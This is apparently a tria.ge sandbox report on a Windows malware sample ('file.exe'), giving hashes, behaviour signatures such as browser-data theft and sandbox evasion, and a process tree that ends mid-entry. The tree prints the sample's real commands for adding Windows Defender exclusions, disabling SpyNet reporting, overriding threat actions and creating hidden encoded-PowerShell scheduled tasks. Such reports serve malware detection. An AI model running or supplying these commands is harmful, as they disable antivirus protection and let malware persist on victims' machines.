Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    123s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27/09/2022, 14:02

General

  • Target

    file.exe

  • Size

    7.3MB

  • MD5

    3242ae2edccc379bf6f29af7969e3bbc

  • SHA1

    a6a30fabb8a26ac544bfbb699c0553eff37116de

  • SHA256

    1a3215e55898b9d944a1d74d2c77d72edbb6385613a51e9b22568fc942e83e28

  • SHA512

    5876e2db0a58e416d72be43bea21aca6900d0eb5779b5cfffa58e53bc784664c8b454547dc451bbb51abd4e6b43ace3ee52367837d0179e940d3e002f8391fed

  • SSDEEP

    196608:91OHzWMQ1MJoW7dz1VrfHEve6knxIwynv97oh7QGs:3OHzTZPNDkvFEEoh7Qt

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Executes dropped EXE 4 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 3 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 31 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 11 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 40 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4308
    • C:\Users\Admin\AppData\Local\Temp\7zSE0B0.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:5040
      • C:\Users\Admin\AppData\Local\Temp\7zSE506.tmp\Install.exe
        .\Install.exe /S /site_id "525403"
        3⤵
        • Executes dropped EXE
        • Checks BIOS information in registry
        • Checks computer location settings
        • Drops file in System32 directory
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:1600
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4932
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3680
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
              6⤵
                PID:1772
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                6⤵
                  PID:3948
            • C:\Windows\SysWOW64\forfiles.exe
              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1884
              • C:\Windows\SysWOW64\cmd.exe
                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:4844
                • \??\c:\windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                  6⤵
                    PID:3592
                  • \??\c:\windows\SysWOW64\reg.exe
                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                    6⤵
                      PID:2104
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /CREATE /TN "gWIpEJDOa" /SC once /ST 03:54:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                  4⤵
                  • Creates scheduled task(s)
                  PID:3808
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /run /I /tn "gWIpEJDOa"
                  4⤵
                    PID:3996
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /DELETE /F /TN "gWIpEJDOa"
                    4⤵
                      PID:1252
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /CREATE /TN "bJrbMHMDNUyqMIPThG" /SC once /ST 16:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\FyanvruEjIbEvqxKf\fmiJyxyNihWESXk\dHrUWvg.exe\" FN /site_id 525403 /S" /V1 /F
                      4⤵
                      • Drops file in Windows directory
                      • Creates scheduled task(s)
                      PID:3172
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                1⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:1168
                • C:\Windows\system32\gpupdate.exe
                  "C:\Windows\system32\gpupdate.exe" /force
                  2⤵
                    PID:4412
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                  1⤵
                    PID:384
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                    1⤵
                      PID:3796
                    • C:\Windows\system32\gpscript.exe
                      gpscript.exe /RefreshSystemParam
                      1⤵
                        PID:1532
                      • C:\Users\Admin\AppData\Local\Temp\FyanvruEjIbEvqxKf\fmiJyxyNihWESXk\dHrUWvg.exe
                        C:\Users\Admin\AppData\Local\Temp\FyanvruEjIbEvqxKf\fmiJyxyNihWESXk\dHrUWvg.exe FN /site_id 525403 /S
                        1⤵
                        • Executes dropped EXE
                        • Drops file in System32 directory
                        • Suspicious use of WriteProcessMemory
                        PID:4972
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                          2⤵
                          • Drops file in System32 directory
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:2528
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                            3⤵
                            • Suspicious use of WriteProcessMemory
                            PID:2368
                            • C:\Windows\SysWOW64\reg.exe
                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                              4⤵
                                PID:4588
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                              3⤵
                                PID:4024
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                3⤵
                                  PID:4268
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                  3⤵
                                    PID:4016
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                    3⤵
                                      PID:3456
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                      3⤵
                                        PID:5048
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                        3⤵
                                          PID:2208
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                          3⤵
                                            PID:528
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                            3⤵
                                              PID:4772
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                              3⤵
                                                PID:4476
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                3⤵
                                                  PID:4532
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                  3⤵
                                                    PID:3600
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                    3⤵
                                                      PID:1020
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                      3⤵
                                                        PID:3428
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                        3⤵
                                                          PID:1860
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                          3⤵
                                                            PID:3524
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                            3⤵
                                                              PID:2104
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                              3⤵
                                                                PID:4056
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                3⤵
                                                                  PID:2168
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                  3⤵
                                                                    PID:3624
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                    3⤵
                                                                      PID:1884
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                      3⤵
                                                                        PID:4932
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                        3⤵
                                                                          PID:3836
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                          3⤵
                                                                            PID:4504
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MCYGDcGEHxUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MCYGDcGEHxUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\acZjXHcfgPYOcXywQzR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\acZjXHcfgPYOcXywQzR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fCscXRmSsoZU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fCscXRmSsoZU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jPDVFKipU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jPDVFKipU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yNjTJhHiELlhC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yNjTJhHiELlhC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\NTslqXAyKxgJdOVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\NTslqXAyKxgJdOVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\FyanvruEjIbEvqxKf\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\FyanvruEjIbEvqxKf\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\xKkxXQQPSIyydVpo\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\xKkxXQQPSIyydVpo\" /t REG_DWORD /d 0 /reg:64;"
                                                                          2⤵
                                                                          • Drops file in System32 directory
                                                                          • Modifies data under HKEY_USERS
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:3432
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MCYGDcGEHxUn" /t REG_DWORD /d 0 /reg:32
                                                                            3⤵
                                                                              PID:5020
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MCYGDcGEHxUn" /t REG_DWORD /d 0 /reg:32
                                                                                4⤵
                                                                                  PID:4952
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MCYGDcGEHxUn" /t REG_DWORD /d 0 /reg:64
                                                                                3⤵
                                                                                  PID:400
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\acZjXHcfgPYOcXywQzR" /t REG_DWORD /d 0 /reg:32
                                                                                  3⤵
                                                                                    PID:3000
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\acZjXHcfgPYOcXywQzR" /t REG_DWORD /d 0 /reg:64
                                                                                    3⤵
                                                                                      PID:1496
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fCscXRmSsoZU2" /t REG_DWORD /d 0 /reg:32
                                                                                      3⤵
                                                                                        PID:4620
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fCscXRmSsoZU2" /t REG_DWORD /d 0 /reg:64
                                                                                        3⤵
                                                                                          PID:2576
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jPDVFKipU" /t REG_DWORD /d 0 /reg:32
                                                                                          3⤵
                                                                                            PID:2120
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jPDVFKipU" /t REG_DWORD /d 0 /reg:64
                                                                                            3⤵
                                                                                              PID:1160
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yNjTJhHiELlhC" /t REG_DWORD /d 0 /reg:32
                                                                                              3⤵
                                                                                                PID:4480
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yNjTJhHiELlhC" /t REG_DWORD /d 0 /reg:64
                                                                                                3⤵
                                                                                                  PID:4696
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\NTslqXAyKxgJdOVB /t REG_DWORD /d 0 /reg:32
                                                                                                  3⤵
                                                                                                    PID:1276
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\NTslqXAyKxgJdOVB /t REG_DWORD /d 0 /reg:64
                                                                                                    3⤵
                                                                                                      PID:3852
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\FyanvruEjIbEvqxKf /t REG_DWORD /d 0 /reg:32
                                                                                                      3⤵
                                                                                                        PID:4752
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\FyanvruEjIbEvqxKf /t REG_DWORD /d 0 /reg:64
                                                                                                        3⤵
                                                                                                          PID:3548
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\xKkxXQQPSIyydVpo /t REG_DWORD /d 0 /reg:32
                                                                                                          3⤵
                                                                                                            PID:2380
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\xKkxXQQPSIyydVpo /t REG_DWORD /d 0 /reg:64
                                                                                                            3⤵
                                                                                                              PID:4392
                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                            schtasks /CREATE /TN "gXEayGZYk" /SC once /ST 14:50:45 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                            2⤵
                                                                                                            • Creates scheduled task(s)
                                                                                                            PID:1148
                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
